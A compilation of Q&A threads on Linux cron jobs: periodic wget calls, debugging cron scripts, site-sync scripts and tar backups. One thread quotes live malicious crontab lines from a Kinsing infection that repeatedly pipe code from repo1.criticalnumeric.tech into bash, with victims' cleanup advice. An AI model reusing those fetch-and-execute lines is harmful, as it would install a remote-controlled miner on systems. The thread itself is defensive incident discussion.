How to call a URL periodically form a linux box (cron job)? - cron

I have a shell access on a Linux box where my Website resides.
I want to call a URL each hour on that Website (it's not a specific PHP file, I have codeigniter has a framework and some Apache redirects, so I really need to call a URL).
I guess I can use wget and crontab? How?

Add this to /etc/crontab
0 * * * * wget -O - -q -t 1 http://www.example.com/cron.php
Alternatively, create a shell script in the /etc/cron.hourly
File: wget
#!/bin/sh
wget -O - -q -t 1 http://www.example.com/cron.php
make sure you chmod +x wget (or whatever filename you picked)

Related

Does somebody knows about this: repo1.criticalnumeric.tech

I found that in the company server there is a crontab that runs with this code:
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/kworker?time=1612899272" | bash;wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -o /dev/null -O - | bash;busybox wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -O - | bash
If you go to that URL it reads:
"This is official page of repository linux"
This is weird, none of our engineers added this on the crontab, which makes me think that it could be an attack.
Any thoughts?
If your server is hosting a web application built using Laravel framework and if your debug mode is turned on, you are probably suffering from a recent RCE (Remote Code Execution) exploit.
Blogpost about technical details of the bug: https://www.ambionics.io/blog/laravel-debug-rce
CVE: https://nvd.nist.gov/vuln/detail/CVE-2021-3129
My professional recommendation: Never run your application with debug mode open on production.
The kinsing malware is the responsible for this attack, this takes control over the crontab to maintain infected the server, I had experience with this attack and for me the only way to clean the server is to backup all the important data and reinstall from cero, I followed all the recipes and nothing work to stop it, the most important with this attack is to change the permission on the cron tab file avoiding the malware to overwrite it.
Another important thing is to see the permissions of the .ssh on the infected user, because this prevents to login using the ssh keys, you must restore the permissions to the original state to grant access again.
Search for the kdevtmpfsi executable that is somewhere in the /var/tmp, delete it and create a dummy file with the same name with all the permissions to 000, this action is not the cure but serve to gain time to backup.
I think that it is related to the issue on the link below. I saw similar entries appear on the result of a ps aux command on one of our servers. If you are unlucky, you will find kdevtmpfsi is now hogging all of your CPU.
kdevtmpfsi - how to find and delete that miner
We had same attack sat Feb 13, I changed the permisions to the crontab directory only rwx to root. Before we killed all the process of www-data with "killall -u www-data -9 " so far no other instance of the offending process... will keep monitoring. Also we disabled curl because we don't needed it.
I'm having same problem. Debian 10 server.
I checked with htop and found these:
curl -kL http://repo1.criticalnumeric.tech/scripts/cnc/install?time=1613422342
and
bash /tmp/.ssh-www-data/kswapd4
Both under www-data user. Those processes were using whole resources (CPU and memory).
Found something strange in www-data cron
root#***:/var/www# cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/tmp.eK8YZtGlIC/.sync.log installed on Mon Feb 15 23:27:41 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash
#reboot curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash
https://pastebin.com/Q049ZZtW
I think I have to reinstall Debian 10 on my server... Or how to clean it?

crontab bash script not running

I updated the script with the absolute paths. Also here is my current cronjob entry.
I went and fixed the ssh key issue so I know it works know, but might still need to tell rsync what key to use.
The script runs fine when called manually by user. It looks like not even the rm commands are being executed by the cron job.
UPDATE
I updated my script but basically its the same as the one below. Below I have a new cron time and added an error output.
I get nothing. It looks like the script doesn't even run.
crontab -e
35 0 * * * /bin/bash /x/y/z/s/script.sh 2>1 > /tmp/tc.log
#!/bin/bash
# Clean up
/bin/rm -rf /z/y/z/a/b/current/*
cd /z/y/z/a/to/
/bin/rm -rf ?s??/D????
cd /z/y/z/s/
# Find the latest file
FILE=`/usr/bin/ssh user#server /bin/ls -ht /x/y/z/t/a/ | /usr/bin/head -n 1`
# Copy over the latest archive and place it in the proper directory
/usr/bin/rsync -avz -e /urs/bin/ssh user#server:"/x/y/z/t/a/$FILE" /x/y/z/t/a/
# Unzip the zip file and place it in the proper directory
/usr/bin/unzip -o /x/y/z/t/a/$FILE -d /x/y/z/t/a/current/
# Run Dev's script
cd /x/y/z/t/
./old.py a/current/ t/ 5
Thanks for the help.
I figured it out, I'm use to working in cst and the server was in gmt time.
Thanks everybody for the help.

cron-job linux apache ssl

I have a server installed with apache2 and drupal 6. In my server, I have installed a module which need to use cron. I have a SSL certificate installed too.
In my crontab y have this configuration:
* * * * * wget -O --q -t 1 http://domain:8280/folder/cron.php
* * * * * wget --no-check-certificate -O --q -t 1 https://domain/folder/cron.php
My server work but if I write this configuration in my sites-enabled/000-default:
redirect permanent / https://domain/
my module with cron stops working. This is my error in syslog:
grandchild #20349 failed with status 5
I need to redirect my traffic from http to https.
First, make sure your redirect directive in 000-default.conf is correct (see Apache wiki for details) and doesn't interfere with configuration in .htaccess file, if there is any.
Then fix you crontab this way:
Remove the first line, as you don't need plain http anymore
Change the second line for this:
wget --no-check-certificate -O /dev/null --quiet -t 1 https://domain/folder/cron.php
wget's option -O requires a path to a file, so either specify it, or just redirect to /dev/null. Also, in some versions of wget option -q considered ambiguous, so it's better to use --quiet to supress output instead.
Sometimes you may want to put your rather longish command into a shell script file, make it executable (chmod +x your-script.sh) and make sure it does exactly what you want it to do when run under the webserver's user (sudo -u www-data /path/to/your-script.sh and check if it did the trick to your drupal module). Then use the path to your script in the crontab. That will ensure that everything works like a charm and will keep your crontab neat and valid.

Script to download a web page

i made a web server to show my page locally, because is located in a place with a poor connection so what i want to do is download the page content and replace the old one, so i made this script running in background but i am not very sure if this will work 24/7 (the 2m is just to test it, but i want it to wait 6-12 hrs), so, ¿what do you think about this script? is insecure? or is enough for what i am doing? Thanks.
#!/bin/bash
a=1;
while [ $a -eq 1 ]
do
echo "Starting..."
sudo wget http://www.example.com/web.zip --output-document=/var/www/content.zip
sudo unzip -o /var/www/content.zip -d /var/www/
sleep 2m
done
exit
UPDATE: This code i use now:
(Is just a prototype but i pretend not using sudo)
#!/bin/bash
a=1;
echo "Start"
while [ $a -eq 1 ]
do
echo "Searching flag.txt"
if [ -e flag.txt ]; then
echo "Flag found, and erasing it"
sudo rm flag.txt
if [ -e /var/www/content.zip ]; then
echo "Erasing old content file"
sudo rm /var/www/content.zip
fi
echo "Downloading new content"
sudo wget ftp://user:password#xx.xx.xx.xx/content/newcontent.zip --output-document=/var/www/content.zip
sudo unzip -o /var/www/content.zip -d /var/www/
echo "Erasing flag.txt from ftp"
sudo ftp -nv < erase.txt
sleep 5s
else
echo "Downloading flag.txt"
sudo wget ftp://user:password#xx.xx.xx.xx/content/flag.txt
sleep 5s
fi
echo "Waiting..."
sleep 20s
done
exit 0
erase.txt
open xx.xx.xx.xx
user user password
cd content
delete flag.txt
bye
I would suggest setting up a cron job, this is much more reliable than a script with huge sleeps.
Brief instructions:
If you have write permissions for /var/www/, simply put the downloading in your personal crontab.
Run crontab -e, paste this content, save and exit from the editor:
17 4,16 * * * wget http://www.example.com/web.zip --output-document=/var/www/content.zip && unzip -o /var/www/content.zip -d /var/www/
Or you can run the downloading from system crontab.
Create file /etc/cron.d/download-my-site and place this content into in:
17 4,16 * * * <USERNAME> wget http://www.example.com/web.zip --output-document=/var/www/content.zip && unzip -o /var/www/content.zip -d /var/www/
Replace <USERNAME> with a login that has suitable permissions for /var/www.
Or you can put all the necessary commands into single shell script like this:
#!/bin/sh
wget http://www.example.com/web.zip --output-document=/var/www/content.zip
unzip -o /var/www/content.zip -d /var/www/
and invoke it from crontab:
17 4,16 * * * /path/to/my/downloading/script.sh
This task will run twice a day: at 4:17 and 16:17. You can set another schedule if you'd like.
More on cron jobs, crontabs etc:
Add jobs into cron
CronHowto on Ubuntu
Cron(Wikipedia)
Simply unzipping the new version of your content overtop the old may not be the best solution. What if you remove a file from your site? The local copy will still have it. Also, with a zip-based solution, you're copying EVERY file each time you make a copy, not just the files that have changed.
I recommend you use rsync instead, to synchronize your site content.
If you set your local documentroot to something like /var/www/mysite/, an alternative script might then look something like this:
#!/usr/bin/env bash
logtag="`basename $0`[$$]"
logger -t "$logtag" "start"
# Build an array of options for rsync
#
declare -a ropts
ropts=("-a")
ropts+=(--no-perms --no-owner --no-group)
ropts+=(--omit-dir-times)
ropts+=("--exclude ._*")
ropts+=("--exclude .DS_Store")
# Determine previous version
#
if [ -L /var/www/mysite ]; then
linkdest="$(stat -c"%N" /var/www/mysite)"
linkdest="${linkdest##*\`}"
ropts+=("--link-dest '${linkdest%'}'")
fi
now="$(date '+%Y%m%d-%H:%M:%S')"
# Only refresh our copy if flag.txt exists
#
statuscode=$(curl --silent --output /dev/stderr --write-out "%{http_code}" http://www.example.com/flag.txt")
if [ ! "$statuscode" = 200 ]; then
logger -t "$logtag" "no update required"
exit 0
fi
if ! rsync "${ropts[#]}" user#remoteserver:/var/www/mysite/ /var/www/"$now"; then
logger -t "$logtag" "rsync failed ($now)"
exit 1
fi
# Everything is fine, so update the symbolic link and remove the flag.
#
ln -sfn /var/www/mysite "$now"
ssh user#remoteserver rm -f /var/www/flag.txt
logger -t "$logtag" "done"
This script uses a few external tools that you may need to install if they're not already on your system:
rsync, which you've already read about,
curl, which could be replaced with wget .. but I prefer curl
logger, which is probably installed in your system along with syslog or rsyslog, or may be part of the "unix-util" package depending on your Linux distro.
rsync provides a lot of useful functionality. In particular:
it tries to copy only what has changed, so that you don't waste bandwidth on files that are the same,
the --link-dest option lets you refer to previous directories to create "links" to files that have not changed, so that you can have multiple copies of your directory with only single copies of unchanged files.
In order to make this go, both the rsync part and the ssh part, you will need to set up SSH keys that allow you to connect without requiring a password. That's not hard, but if you don't know about it already, it's the topic of a different question .. or a simple search with your favourite search engine.
You can run this from a crontab every 5 minutes:
*/5 * * * * /path/to/thisscript
If you want to run it more frequently, note that the "traffic" you will be using for every check that does not involve an update is an HTTP GET of the flag.txt file.

tar archiving via cron does not work

I am trying to archive my localhost's root folder with tar and want to automate it's execution on a daily basis with crontab. For this purpose, I created a 'backupfolder' in my personal folder. I am running on Ubuntu 12.04.
The execution of tar in the command line works fine without problems:
sudo tar -cvpzf backupfolder/localhost.tar.gz /var/www
However, when I schedule the command for a daily backup (let's say at 17.00) in sudo crontab -e, it is not executing, i.e. the backup does not update using the following command:
0 17 * * * sudo tar -cpzf backupfolder/localhost.tar.gz /var/www
I already tried the full path home/user/backupfolder/localhost.tar.gz without success.
var/log/syslog gives me the following output for the scheduled execution:
Feb 2 17:00:01 DESKTOP-PC CRON[12052]: (root) CMD (sudo tar -cpzfbackupfolder/localhost.tar.gz /var/www)
Feb 2 17:00:01 DESKTOP-PC CRON[12051]: (CRON) info (No MTA installed, discarding output)
/etc/crontab specifies the following path:
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
I assume that crontab is not executing as this is a sudo command.
Is there a way how I can get this running? What is the recommended, safe way if I don't want to hardcode my root password?
Well, the command that works for you is
sudo tar -cvpzf backupfolder/localhost.tar.gz /var/www
Which means, you have to run the command with sudo access, and it will not work from within your crontab.
I would suggest adding the cron job to the root user's crontab.
Basically, do
sudo crontab -e
And add an entry there
0 17 * * * cd /home/user/backupfolder && tar -cpzf localhost.tar.gz /var/www
If that doesn't work, add the full path of tar (like /bin/tar).
Also, while debugging, set the cronjob to run every minute (* * * * *)
Basically the problem is the sudo command so we will allow sudo to run tar for the "user" without prompting for the password.
Add the following line in /etc/sudoers file.
user ALL=(ALL) NOPASSWD:/bin/tar
where user is the user installing the crontab.
I suspect a PATH problem, try to set some variables at the top of sudo crontab -e :
MAILTO=your_email#domain.tld # to get the output if there's errors
PATH=/usr/bin:/bin:/usr/local/bin:/usr/local/sbin:/sbin
You can write your command in a script like run.sh
#/bin/sh -l
tar -cvpzf backupfolder/localhost.tar.gz /var/www
then use the crontab to run the script.
IMPORTANT NOTE: the script's first line has the "-l" option.
Try it.

Resources